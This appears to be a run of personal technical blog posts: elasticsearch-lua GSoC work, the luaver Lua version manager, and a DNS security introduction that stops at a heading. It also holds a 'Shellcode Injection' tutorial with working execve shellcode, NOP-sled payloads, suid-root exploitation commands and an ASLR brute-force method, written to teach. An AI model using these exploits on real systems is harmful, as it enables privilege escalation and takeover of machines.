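            conn.execute(
                "INSERT INTO users (username, password) VALUES (?, ?)",
                (name, password),
            )
    except (ValueError, sqlite3.IntegrityError):
        return False
    return True


print(register(conn, "vampire", "my_password"))
print(register(conn, "vampire" + " " * 19 + "1", "random_pass"))
print(register(conn, "vampire      ", "random_pass"))
```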

Elasticsearch Lua II

2016-08-16T00:00:00+00:00

This post is about my GSoC project, which I worked on during the summer of 2016. I worked under the LabLua organization on adding a test suite and improving documentation for elasticsearch-lua.

Introduction

Elasticsearch is a distributed, scalable and full-text search engine based on Lucene. It provides an HTTP web interface and handles JSON documents. It is presently ranked 1 in the category of ‘Search engines’.

elasticsearch-lua is a client for Elasticsearch that provides a wrapper over the REST interface for the Lua Programming Language. I developed it as part of GSoC 2015 with my mentor Pablo Musa.

My GSoC project this year was entitled ‘Improve elasticsearch-lua tests and builds’ and was a continuation of the work that I had done last year. Apart from adding a test suite for elasticsearch-lua and making it robust, I also decided to work on the documentation of the code.

Test suite for elasticsearch-lua

The tests are divided into unit, integration and stress tests. Note that all these tests run for Lua 5.1, 5.2, 5.3 and LuaJIT 2.0. Code coverage is measured for unit tests and integration tests. Coveralls was chosen to measure and maintain code coverage. As of now, around 91% of the code is covered with tests.

Unit Tests

There are many different modules within elasticsearch-lua. For every such module, there is a corresponding unit test. Unit tests can be found in the tests/ directory. Care was taken to test all the endpoints extensively. Some key points to note:

Some modules were ‘mocked’ to intercept external calls.
Not only return values (success or failure) but every internal parameter was ‘deep’ checked. Deep check involves checking each nested parameter recursively. For example, a lua table might have another table inside it.
Travis was chosen for continuous integration. Every time code is pushed, a build is triggered on Travis and unit tests are run. Success or failure status is reported back.
A number of bugs (pertaining to generating of target url for endpoint, and listing source files in the rockspec file) were found by running the tests. All were fixed.
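
To illustrate what a ‘deep’ check means, here is a small Python stand-in that walks two nested structures and reports where they first differ. It is not the helper used in the elasticsearch-lua test suite (which is written in Lua); the function name and the sample data are made up.

```python
def first_mismatch(expected, actual, path="root"):
    """Return the path of the first difference between two nested values, or None."""
    if isinstance(expected, dict) and isinstance(actual, dict):
        for key in sorted(set(expected) | set(actual), key=str):
            if key not in expected or key not in actual:
                return f"{path}.{key}"
            found = first_mismatch(expected[key], actual[key], f"{path}.{key}")
            if found:
                return found
        return None
    if isinstance(expected, list) and isinstance(actual, list):
        if len(expected) != len(actual):
            return path
        for i, (e, a) in enumerate(zip(expected, actual)):
            found = first_mismatch(e, a, f"{path}[{i}]")
            if found:
                return found
        return None
    return None if expected == actual else path


expected = {"index": "my_index", "body": {"query": {"terms": [1, 2]}}}
actual = {"index": "my_index", "body": {"query": {"terms": [1, 3]}}}
print(first_mismatch(expected, actual))
```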

The diff of changes due to unit tests can be seen here.

Integration Tests

Apart from the test of every component individually, it is equally important that they work together while interacting with each other. To make elasticsearch-lua robust, it was necessary to add some integration tests.

Integration tests involve calling an API function in a real environment and testing parameters at every point. Wrappers for some API functions were developed so as to avoid repeated code.
We believe that using real data for integration tests is always a good practice. Also, the test dataset should stress the system a bit and, thus, it should not be very small. Therefore, we opted to use part of the data freely available from www.githubarchive.org. A mirror is maintained here. The dataset is not a part of the main repository due to its size, so it is downloaded on the fly while running tests on Travis.
Common operations (such as search, index, get, delete and bulk) were tested in a single run. These operations are intermixed together.

The diff of changes due to integration tests can be seen here.

Stress Tests

Stress tests involve testing elasticsearch-lua limits. By having these tests, the client will be able to prove its stability in an effective manner.

A separate framework for stress testing was designed, considering that it might take a few hours to finish. In short, every successful (unit + integration tests) build triggers a new build, which runs the stress tests, provided that no such build is already running.
The status of stress tests is reported through a separate badge in the README.

The diff of changes due to stress tests can be seen here.

Documentation

Having good documentation is very important for any library. It helps developers understand the functionality without having to investigate the code. Moreover, it helps adoption of the library, as new developers can use it as a guide to get started. Although this was initially not a task for the GSoC project, after realizing its importance, I opted to invest a lot of time in the documentation and added it to the GSoC project timeline.

Guides

The guides consist of documents and tutorials that help developers to install, use and customize elasticsearch-lua. The guides explain the most frequently used functionalities along with some internals. These pages are hosted here.

API Documentation

The API Documentation lists all possible functions provided by the elasticsearch-lua. Each function name is accompanied by the parameters that it accepts. The API documentation is published here.

The diff of changes pertaining to documentation can be seen here.

Additional tasks (Not part of GSoC)

Apart from the tasks mentioned above, I worked on the following as well:

Luaver

While working with elasticsearch-lua, I had to frequently switch between different versions of lua while developing the test suite. Switching is not simple and I faced the following issues often:

Building different lua versions required some effort such as downloading the version source, unzipping, installing and managing any dependency faced. Also, the previous version had to be deleted completely in order to avoid any ambiguity.
Luarocks installation depends on the Lua version. Switching lua versions can mess up the installed rocks.
To solve these issues I used workaround methods, such as editing the source code of some existing rocks.
Sometimes, these code changes broke the entire rock. In such cases, I had to remove all existing rocks, rebuild luarocks and then reinstall the needed rocks.

As I was already familiar with NodeJS and Ruby and understood how such problems were addressed by nvm and rvm, I decided to create a similar tool for lua, and that is how luaver was born.

I also wrote a separate blog post about luaver and you can support the project here. Initially, I didn’t expect to spend much time on it and figured that I could manage GSoC and develop luaver simultaneously. However, at some point I got too involved in luaver, which put me one week behind the timeline that I had proposed for GSoC. Nevertheless, I caught up soon afterwards.

Updating elasticsearch-lua

It is important that the client implements all the features provided by Elasticsearch. Also, Elasticsearch is evolving quickly and releasing at a fast pace, so it is important that clients stay up to date. Some features were missing and the client version was 1.6 while Elasticsearch was at 2.3. Therefore, I decided to update existing features and implement some of the missing ones.

Benefits of working on the same project for two consecutive years

I myself had written the client. The codebase was already at my finger-tips. I could spend more time working than understanding and getting comfortable with the code.
I wanted to further consolidate my client and make it stable. I couldn’t get much time during the rest of the year to work full-fledged on the development. Google Summer of Code offered a nice incentive.
I had already worked with the Lua community. Being in a familiar environment, I was able to work and think freely. luaver was created to benefit the open source Lua community. If this had been my first time, I wouldn’t even have thought about developing it.

Lua Version Manager

2016-07-03T00:00:00+00:00

This post is about installing and maintaining multiple versions of Lua, LuaJIT, and Luarocks using luaver. This is perhaps the easiest and the most systematic way to go about installing any of the above.

Introducing Lua Version Manager (luaver)

Lua Version Manager or luaver allows you to easily install and switch between multiple versions of lua, luajit, and luarocks in a seamless and consistent manner. The source code is on Github.

Motivation

I was working on a few projects involving lua such as elasticsearch-lua and the sailor web framework. Therein, I frequently had to shift between different versions of Lua to manage dependencies as well as for testing purposes. The following issues motivated me to create luaver:

Building different lua versions required some effort as I had to frequently shift between them.
Luarocks installation depends on the Lua version. Switching lua versions can mess up the installed rocks.
To solve these issues I used workaround methods such as editing the source code of some existing rocks.
Sometimes, these code changes broke the entire rock. In such cases, I had to remove all existing rocks, rebuild luarocks and then reinstall the needed rocks.

I was already familiar with NodeJS and Ruby and understood how such problems were addressed by nvm and rvm.

Installing Lua, LuaJIT, Luarocks with luaver

Using luaver it is very easy to install Lua, LuaJIT or Luarocks. It works by modifying your environment variables. Hence, every terminal session can have a separate environment.

Installing luaver

First of all, you would need to install luaver itself.

curl https://raw.githubusercontent.com/DhavalKapil/luaver/master/install.sh -o install.sh && . ./install.sh

You might need to manually set up a ~/.bashrc or ~/.zshrc file.

Installing Lua

To install lua you can simply specify the version you want to install:

luaver install 5.3.1  # Installs lua-5.3.1

Verify your installation by running:

lua -v

You might need to install libreadline-dev as a dependency for lua. To install older 32-bit lua versions on 64-bit machines, you will require some additional header files. You can get them by installing lib32ncurses5-dev.

Installing LuaJIT

luaver install-luajit 2.0.2  # Installs luajit-2.0.2

Installing Luarocks

luaver install-luarocks 2.3.0  # Installs luarocks-2.3.0

Switching between versions

You can easily switch between different versions:

luaver use 5.3.2           # Switches to lua version 5.3.2
luaver use-luajit 2.0.0    # Switches to luajit version 2.0.0
luaver use-luarocks 2.3.0  # Switches to luarocks version 2.3.0

The switch will be instantaneous and without any glitches. Consistency will be maintained between lua and luarocks. Rocks are installed separately for different versions of luarocks and lua.

Setting default version

You can also set default version of lua, luajit and luarocks that will be active whenever you start a new terminal session.

luaver set-default 5.3.2           # Set lua-5.3.2 as the default version
luaver set-default-luajit 2.0.0    # Set luajit-2.0.0 as the default version
luaver set-default-luarocks 2.3.0  # Set luarocks-2.3.0 as the default version

Listing all installed versions

luaver list           # Lists all installed lua versions
luaver list-luajit    # Lists all installed luajit versions
luaver list-luarocks  # Lists all installed luarocks versions

Getting currently used versions of Lua, LuaJIT, Luarocks

The following command will give you the currently used versions:

luaver current

For complete usage run:

luaver help

Facing any issue?

If you face any issue don’t hesitate to file an issue on the Github repository.

Any suggestions, improvements?

luaver is still in its early stages. Feel free to submit a pull request! However if you are planning on some big thing, do discuss it beforehand.

Shellcode Injection

2015-12-26T00:00:00+00:00

Introduction

Here I am going to demonstrate how to gain shell access by overflowing a vulnerable buffer. I shall show it with ASLR disabled as well as with ASLR enabled (for those who don’t know about ASLR, I’ll come to it soon). This post is a continuation of ‘Buffer Overflow Exploit’, which I wrote earlier. You need not go through it if you’re already familiar with the topic.

Prerequisites:

I expect you to have some basic knowledge about C, gcc, command line and x86 assembly. There are plenty of online sources available for them. Apart from that, you should know about the memory layout of a C program and some idea about overflowing the buffer. In case you are not familiar, I suggest reading my earlier blog post.

Scenario:

You have access to a system with an executable binary that is owned by root, has the suid bit set, and is vulnerable to buffer overflow. We will now exploit it to gain shell access. To learn more about the suid bit see this

Setting up the environment:

First create a user test without root privileges:
```
[sudo] adduser test
```

Create vuln.c in the home directory for test user.

#include <stdio.h>
#include <string.h>

void func(char *name)
{
    char buf[100];
    strcpy(buf, name);
    printf("Welcome %s\n", buf);
}

int main(int argc, char *argv[])
{
    func(argv[1]);
    return 0;
}

Here is the link to the above mentioned code.

Note: You might need sudo while accessing the home directory for test user.

Let’s compile it.

For 32 bit systems
```
[sudo] gcc vuln.c -o vuln -fno-stack-protector -z execstack
```
For 64 bit systems
```
[sudo] gcc vuln.c -o vuln -fno-stack-protector -m32 -z execstack
```
-fno-stack-protector disables the stack protection. Smashing the stack is now allowed. -m32 makes sure that the compiled binary is 32 bit. You may need to install some additional libraries to compile 32-bit binaries on 64-bit machines. -z execstack makes the stack executable (we’re going to run the shellcode, right?). You can download the binary generated on my machine here.

Setting up permissions

[sudo] chown root:test vuln
[sudo] chmod 550 vuln
[sudo] chmod u+s vuln

Confirm by listing the file, ls -l vuln

-r-sr-x--- 1 root test 7392 Dec 22 00:27 vuln

What is ASLR?

From Wikipedia:

Address space layout randomization (ASLR) is a computer security technique involved in protection from buffer overflow attacks. ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap, and libraries.

In short, when ASLR is turned on, the addresses of the stack, etc. will be randomized. This makes it much harder to predict addresses during exploitation.

To disable ASLR:

echo "0" | [sudo] dd of=/proc/sys/kernel/randomize_va_space

To enable ASLR:

echo "2" | [sudo] dd of=/proc/sys/kernel/randomize_va_space

Shellcode Injection

In the first part, we’ll turn off ASLR and then approach this problem. After disabling ASLR, log into test user. You can switch user on terminal using:

su test

Clearly there is a vulnerability in vuln.c. The strcpy function does not specify a maximum length while copying. Let’s disassemble using objdump and see what we can find.

objdump -d -M intel vuln

This is how it looks (it may not be the same in your case).

It can be observed that buf lies at ebp - 0x6c. 0x6c is 108 in decimal. Hence, 108 bytes are allocated for buf in the stack, the next 4 bytes would be the saved ebp pointer of the previous stack frame, and the next 4 bytes will be the return address.
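The offset arithmetic above can be written out as a quick check. This is only a sketch in Python; the constant names are mine, and the value 0x6c comes from the disassembly on my machine, so it may differ on yours.

```python
BUF_OFFSET_FROM_EBP = 0x6c   # buf starts at ebp - 0x6c (from the disassembly)
SAVED_EBP_SIZE = 4           # saved frame pointer on a 32-bit binary
RETURN_ADDR_SIZE = 4         # return address on a 32-bit binary

# Bytes to write, starting at buf, before each item is reached.
offset_to_saved_ebp = BUF_OFFSET_FROM_EBP
offset_to_return_addr = offset_to_saved_ebp + SAVED_EBP_SIZE
total_payload_len = offset_to_return_addr + RETURN_ADDR_SIZE

print(offset_to_saved_ebp, offset_to_return_addr, total_payload_len)
# prints: 108 112 116
```

So a payload of 116 bytes is exactly long enough to overwrite the return address and nothing beyond it.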

Shellcode injection consists of the following main parts:

The shellcode that is to be injected is crafted.
A possible place is found where we can insert the shellcode.
The program is exploited to transfer execution flow to the location where the shellcode was inserted.

We’ll deal with each of the steps briefly:

Crafting Shellcode

Crafting shellcode is in itself a big topic to cover here. I shall take it in brief. We will create a shellcode that spawns a shell. First create shellcode.nasm with the following code:

xor     eax, eax    ;Clearing eax register
push    eax         ;Pushing NULL bytes
push    0x68732f2f  ;Pushing //sh
push    0x6e69622f  ;Pushing /bin
mov     ebx, esp    ;ebx now has address of /bin//sh
push    eax         ;Pushing NULL byte
mov     edx, esp    ;edx now has address of NULL byte
push    ebx         ;Pushing address of /bin//sh
mov     ecx, esp    ;ecx now has address of address
                    ;of /bin//sh byte
mov     al, 11      ;syscall number of execve is 11
int     0x80        ;Make the system call

Here is the link to the above mentioned code.

To compile it use nasm:

nasm -f elf shellcode.nasm

Use objdump to get the shellcode bytes:

objdump -d -M intel shellcode.o

Extracting the bytes gives us the shellcode:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
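Before using the bytes, it is worth checking two things: the length, and that there is no NULL byte anywhere, since strcpy stops copying at the first NULL byte. A small Python 3 sketch of that check (the variable name is mine):

```python
# The shellcode bytes extracted from objdump above.
shellcode = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)

print(len(shellcode))          # prints: 25
print(b"\x00" in shellcode)    # prints: False
print(b"//sh" in shellcode, b"/bin" in shellcode)  # prints: True True
```

This is also why the assembly uses xor eax, eax and push eax to produce the terminating NULL at run time instead of embedding a zero in the code.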

Finding a possible place to inject shellcode

In this example buf seems to be the perfect place. We can insert the shellcode by passing it inside the first parameter while running vuln. But how do we know at what address buf will be located on the stack? That’s where gdb will help us. As ASLR is disabled, we are sure that no matter how many times the binary is run, the address of buf will not change.

From the official website of GDB

GDB, the GNU Project debugger, allows you to see what is going on `inside’ another program while it executes – or what another program was doing at the moment it crashed.

Basically, with gdb you can run a process, stop it at any given point, examine the memory/etc. It is good to get acquainted with it, however, I shall be using a subset of its features.

So let’s run vuln using gdb:

vampire@linux:/home/test$ gdb -q vuln
Reading symbols from vuln...(no debugging symbols found)...done.
(gdb) break func
Breakpoint 1 at 0x8048456
(gdb) run $(python -c 'print "A"*116')
Starting program: /home/test/vuln $(python -c 'print "A"*116')

Breakpoint 1, 0x08048456 in func ()
(gdb) print $ebp
$1 = (void *) 0xffffce78
(gdb) print $ebp - 0x6c
$2 = (void *) 0xffffce0c

I set a breakpoint at the func function. I then started the binary with a payload of length 116 as the argument. Printing the address ebp - 0x6c shows that buf was located at 0xffffce0c. However, this need not be the address of buf when we run the program outside of gdb. This is because things like environment variables and the name of the program, along with its arguments, are also pushed on the stack. Although the stack starts at the same address (because ASLR is disabled), the difference in the method of running the program will result in a different address for buf. The difference will be a few bytes, and I will demonstrate later how to take care of it.

Note: The length of the payload will have an effect on the location of buf, as the payload itself is also pushed on the stack (it is part of the arguments). I used one of length 116, which will be the length of the final payload that we’ll be passing. In case you change the length of your payload dramatically, always remember to find the address again.

Transferring execution flow of the program to the inserted shellcode

This is the easiest part. We have the shellcode in memory and know its address (with an error of a few bytes). We have already found out that vuln is vulnerable to buffer overflow and that we can modify the return address of the function func.

Crafting payload

Let’s insert the shellcode at the end of the argument string so its address is equal to the address of buf + some length. Here’s our shellcode:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

Length of shellcode = 25 bytes
It is also known that return address starts after the first 112 bytes of buf
We’ll fill the first 40 bytes with NOP instructions

NOP Sled

NOP Sled is a sequence of NOP (no-operation) instructions meant to “slide” the CPU’s instruction execution flow to its final, desired, destination whenever the program branches to a memory address anywhere on the sled. Basically, whenever the CPU sees a NOP instruction, it slides down to the next instruction.

The reason for inserting a NOP sled before the shellcode is that now we can transfer execution flow to anyplace within these 40 bytes. The processor will keep on executing the NOP instructions until it finds the shellcode. We need not know the exact address of the shellcode. This takes care of the earlier mentioned problem of not knowing the address of buf exactly.

We will make the processor jump to the address of buf (taken from gdb’s output) + 20 bytes to get somewhere in the middle of the NOP sled.

0xffffce0c + 20 = 0xffffce20

We can fill the remaining 47 (112 - 25 - 40) bytes with random data, say the ‘A’ character.

Final payload structure:

[40 bytes of NOP - sled] [25 bytes of shellcode] [47 times ‘A’ will occupy 47 bytes] [4 bytes pointing in the middle of the NOP - sled: 0xffffce20]
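The same structure can be assembled programmatically, which makes the arithmetic easy to verify. This is a sketch in Python 3 (the one-liners in this post use Python 2 syntax); the variable names are mine, and the address of buf is the one gdb reported on my machine.

```python
import struct

NOP = b"\x90"
shellcode = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)

buf_addr = 0xffffce0c            # address of buf observed in gdb
return_addr = buf_addr + 20      # land in the middle of the 40-byte sled
offset_to_return = 112           # 108 bytes of buf + 4 bytes of saved ebp

sled = NOP * 40
padding = b"A" * (offset_to_return - len(sled) - len(shellcode))

# "<I" packs the address as a 4-byte little-endian value, as x86 expects.
payload = sled + shellcode + padding + struct.pack("<I", return_addr)

print(len(padding), len(payload), hex(return_addr))
# prints: 47 116 0xffffce20
```

In Python 3, print would not emit the raw bytes, so to pass this payload on the command line it would have to be written with sys.stdout.buffer.write(payload) instead.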

So let’s try to execute it:

test@linux ~ $ ./vuln $(python -c 'print "\x90"*40 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*47 + "\x20\xce\xff\xff"')
Welcome ����������������������������������������j
                            X�Rhn/shh//bi��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4���
# whoami
root

Congratulations! We’ve got root access.

Note: In case you get a segmentation fault, try changing the return address by +- 40 a few times.

To summarize, we overflowed the buffer and modified the return address to point near the start of the buffer in the stack. The buffer itself started with a NOP sled followed by shellcode which got executed. Keep in mind that we did all this with ASLR turned off, which means that the start of the stack wasn’t randomized each time the program was executed. This enabled us to first run the program in gdb to learn the address of the buffer. Make sure you’ve understood everything up to here. Now we shall move on to the exciting part!

Shellcode Injection with ASLR

You can turn ASLR on and try to execute our earlier exploit. There is a great chance that it won’t work. So how do we approach the problem now? To begin, let’s first try to inspect a few things. Let’s create a program that just prints the address of one of its variables, which is stored on the stack.

#include <stdio.h>

int main()
{
    int a;
    printf("%p\n", &a);
    return 0;
}

Here is the link to the above mentioned code.

Compile it to a 32 bit binary as before. This is my output for a few test runs:

test@linux ~ $ ./stack_addr 
0xffe918bc
test@linux ~ $ ./stack_addr 
0xffdc367c
test@linux ~ $ ./stack_addr 
0xffeaf37c
test@linux ~ $ ./stack_addr 
0xffc31ddc
test@linux ~ $ ./stack_addr 
0xffc6a56c
test@linux ~ $ ./stack_addr 
0xffbcf9bc
test@linux ~ $ ./stack_addr 
0xffbcf02c
test@linux ~ $ ./stack_addr 
0xffbf1dcc
test@linux ~ $ ./stack_addr 
0xfffe386c
test@linux ~ $ ./stack_addr 
0xff9547cc

It seems that the variable is loaded at a different address in the stack every time. The address can be represented as 0xffXXXXXc (where X is any hexadecimal digit). With some more testing, it can be seen that even the last half-byte (‘c’ over here) depends on the relative location of the variable inside the program. So in general, the address of a variable on the stack is 0xffXXXXXX. This amounts to 16^6 = 16777216 possible cases. It can be easily seen that the earlier method of exploiting the stack will now work with a probability of only 40/16777216 (40 is the length of the NOP sled; if any of those NOP bytes happens to be where the modified return address points, the shellcode will be executed). That means that, on average, the shellcode will be executed in 1 of every 419431 runs.

Now that is quite depressing. The key point to note here is that the probability depends on the length of the NOP sled. Clearly, by increasing its length we can execute our shellcode with greater probability. However, the length of the buffer is limited. We can’t get much of an increase in probability even by using the full buffer. It looks as if we need to find some other place to inject our NOP sled + shellcode (i.e. modify the second of the three steps listed above).

It turns out that we have another candidate: an environment variable!

We could insert the nop sled + shellcode in an environment variable. Keep in mind that all the environment variables themselves are loaded on the stack. Moreover, the size limit of environment variables is huge. It turns out that on my machine I can create a NOP sled of 100,000!

So let’s create an environment variable SHELLCODE:

export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')

Now let’s choose any random address somewhere in the middle, say 0xff881111. Now run the vuln program, overwriting the return address with this. To increase our chances of hitting the sled, let’s do this repeatedly using a for loop.

test@linux ~ $ for i in {1..100}; do ./vuln $(python -c 'print "A"*112 + "\x11\x11\x88\xff"'); done

After a few runs, we get shell access!

Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Segmentation fault
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Segmentation fault
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Segmentation fault
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Segmentation fault
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
# whoami
root
#

Sweet, isn’t it?

Even if your machine does not support as big a NOP sled as I used, use binary search to choose the maximum allowed. I’ve listed the probabilities of various sizes:

Size of NOP Sled	Probability of shellcode execution	Average no of tries needed to succeed once
40	2.38418579102e-06	419431
100	5.96046447754e-06	167773
500	2.98023223877e-05	33555
1000	5.96046447754e-05	16778
10000	5.96046447754e-04	1678
100000	5.96046447754e-03	168
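The table can be reproduced with a short calculation. This is a sketch in Python 3 under the same simplifying assumption as above, namely that the return address is equally likely to land on any of the 16^6 addresses of the form 0xffXXXXXX; the function names are mine.

```python
import math

ADDRESS_SPACE = 16 ** 6  # addresses of the form 0xffXXXXXX


def sled_odds(sled_len):
    """Return (probability of hitting the sled, average tries needed)."""
    probability = sled_len / ADDRESS_SPACE
    average_tries = math.ceil(ADDRESS_SPACE / sled_len)
    return probability, average_tries


def chance_within(tries, sled_len):
    """Probability of at least one hit in the given number of tries."""
    probability, _ = sled_odds(sled_len)
    return 1 - (1 - probability) ** tries


for sled_len in (40, 100, 500, 1000, 10000, 100000):
    probability, average_tries = sled_odds(sled_len)
    print(sled_len, probability, average_tries)

print(chance_within(100, 100000))
```

With a sled of 100000 bytes, a loop of 100 runs like the one above succeeds at least once a little less than half of the time, so it may need to be repeated.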

In this blog I’ve used the return address(on the stack) to control the execution flow of the program. There are many other possible places for attacking.

Note: I did a talk and a demo about Shellcode Injection in my college as part of ‘Recent trends in Network Security’. Slides can be found here.

Elasticsearch Lua

2015-10-07T00:00:00+00:00

This post is about elasticsearch-lua. I developed it during the summer of 2015 as part of GSoC (Google Summer of Code) 2015. Here I shall describe the reasons for the various software design decisions that I took.

Note: This post is not about ‘How to use elasticsearch-lua’. I would recommend you to go through the README and the documentation on how to use elasticsearch-lua.

Introduction

Elasticsearch is a very powerful and scalable search engine. It provides a REST API accessed through JSON format. There are many clients written in different languages (e.g. php, js, python, ruby) that wrap around the REST API to provide an abstraction. However, there was no client for Lua. My project aimed to create an elasticsearch client for Lua developers.

As part of GSoC 2015 I worked with the LabLua “organization”, a research laboratory at PUC-Rio dedicated to research about programming languages, especially Lua, and my mentor Pablo Musa.

Motivation

I develop applications under the student group SDSLabs. One of our applications had a text-search feature on a large dataset. Using Elasticsearch in the backend greatly enhanced its performance. Seeing its potential, I became greatly interested in it.

Later when I read about the elasticsearch-lua project under GSoC I was quite excited. I was getting the opportunity to develop a client for elasticsearch in Lua. Clearly it had a lot of uses for the developers using the Lua language. My interest in software networking also motivated me to work on this project.

Developing elasticsearch-lua

Influenced by other official clients

Much of the client was influenced by the official clients, mainly elasticsearch-php, elasticsearch-js, and elasticsearch-py. Before even starting with the design of the client I went through the architecture of these clients to get acquainted with the feature set they provide and the conventions they follow. My reason for doing so was to basically prevent ‘reinventing the wheel’ while stable and widely used clients were already present. Also providing the same kind of conventions would help any user, who has already used these other clients, to feel at home while working with the client. This is evident from the below example in which both codes look quite similar. The same applies to most functions as well.

Using the Javascript client to get a document

  var elasticsearch = require('elasticsearch');

  var client = new elasticsearch.Client({
    host: 'localhost:9200',
    log: 'trace'
  });

  client.get({
    index: 'my_index',
    type: 'my_type',
    id: 'my_doc'
  }, function (error, response) {
    // ...
  });

Using the Lua client to get a document

  local elasticsearch = require "elasticsearch"

  local client = elasticsearch.client{
    hosts = {
      { host = "localhost",
        port = 9200
      }
    }
  }

  local data, err = client:get{
    index = "my_index",
    type = "my_type",
    id = "my_doc"
  }

Using Object Oriented Programming

Although Lua does not provide any special construct for declaring objects and classes, I preferred going with object oriented approach mostly because I was used to it. Lua has only the concept of tables. To create an object model over the Lua table, I followed the approach suggested by the language author.

Logging

I looked into log4j while including logging in the client. The log levels defined in the client are the same as the log levels in log4j. The user can specify the log level while creating the client object.

Lua specific constructs

Instead of throwing errors using error() function, I kept on with the Lua convention of returning nil, error. This enables the user to systematically handle errors as and when required. Also, there is a conceptual difference between ‘Application Error’ and ‘Request Error’.

Lua passes tables by reference. Hence, I sometimes maintained a copy of the variables to work on instead of directly changing the passed parameters.
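The same pitfall exists in other languages where containers are shared by reference. As an illustration only, here is a Python analogue of the defensive copy; build_request and the parameter names are hypothetical and do not mirror the client’s actual code.

```python
import copy


def build_request(params):
    """Split user parameters into query and body without mutating the input."""
    local = copy.deepcopy(params)    # work on a private copy
    body = local.pop("body", None)   # safe: only the copy is modified
    return {"query": local, "body": body}


user_params = {"index": "my_index", "body": {"query": {"match_all": {}}}}
request = build_request(user_params)

print("body" in user_params)   # prints: True
print(request["query"])        # prints: {'index': 'my_index'}
```

Without the copy, the pop would have silently removed body from the caller’s table, which is exactly the kind of surprise the client tries to avoid.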

Parameter checking while requesting endpoints

Every request to an endpoint in elasticsearch is associated with various parameters that are passed in the HTTP request. Every kind of endpoint has a list of allowed parameters. I discussed with my mentor the possibility of checking user parameters before sending a request. In the end I decided to implement parameter checking for the following reasons:

The user should focus more on his application rather than elasticsearch.
The user should be notified of invalid parameters as it saves time in debugging his/her own code.
Not much overhead is required to check the parameters passed by the user.
Sending invalid requests will only put unnecessary load on the server and be time-consuming for the client.
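A minimal sketch of such a check is shown below. It is written in Python for illustration; the allow-list contents and the name check_params are assumptions of mine, not the client’s real tables. The return shape imitates the Lua convention of returning nil, error.

```python
# Hypothetical allow-list; the real client keeps its own list per endpoint.
ALLOWED_PARAMS = {
    "get": {"index", "type", "id", "fields", "routing"},
}


def check_params(endpoint, params):
    """Return (True, None) if every key is allowed, else (None, message)."""
    allowed = ALLOWED_PARAMS.get(endpoint)
    if allowed is None:
        return None, "unknown endpoint: " + endpoint
    invalid = sorted(set(params) - allowed)
    if invalid:
        message = "invalid parameters for '%s': %s" % (endpoint, ", ".join(invalid))
        return None, message
    return True, None


print(check_params("get", {"index": "my_index", "id": "my_doc"}))
# prints: (True, None)
print(check_params("get", {"index": "my_index", "idd": "my_doc"}))
# prints: (None, "invalid parameters for 'get': idd")
```

The check is a single set difference per request, which is why the overhead is negligible compared to a network round trip for a request that the server would reject anyway.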

Overall it’s been a wonderful experience developing elasticsearch-lua and working for Google Summer of Code. It was a great learning for me. I shall continue developing it further. Feel free to contribute!

DNS Security

2015-09-08T00:00:00+00:00

Introduction

The Domain Name System is an essential component of the functionality of most Internet services. It provides a distributed solution for services such as resolving host names to IP addresses and vice versa. DNS was designed around the early 1980s without any security consideration. This was mainly because at that time networks were quite small. All the hosts in the network were known beforehand and trustworthy. There was no need for authenticity.

But as the network grew and the Internet was born, DNS remained unchanged. This resulted in many threats that target DNS, owing to the lack of authenticity and integrity checking of the data held within the DNS. In 1994, the Internet Engineering Task Force (IETF) started working to add security extensions known as Domain Name System Security Extensions (DNSSEC) to the existing DNS protocol. Unfortunately, these extensions are still far from being widely adopted.

A discussion on each of these topics is presented in this blog.

About DNS

As per wikipedia

The Domain Name System (DNS) is a hierarchical distributed naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participating entities. Most prominently, it translates domain names, which can be easily memorized by humans, to the numerical IP addresses needed for the purpose of computer services and devices worldwide.

Image Source: here

DNS is like a phone book for the Internet. One can’t remember each and every IP for the websites that he or she visits. It’s much easier to remember the domain names instead.

Threats involving DNS

Zone File Compromise
Zone Information Leakage/DNS Footprinting
DNS Amplification Attack
DNS Client flooding
DNS Cache poisoning
DNS Vulnerabilities in Shared Host Environments
DNS Man in the Middle Attacks - DNS Hijacking
Typosquatting

Zone File Compromise

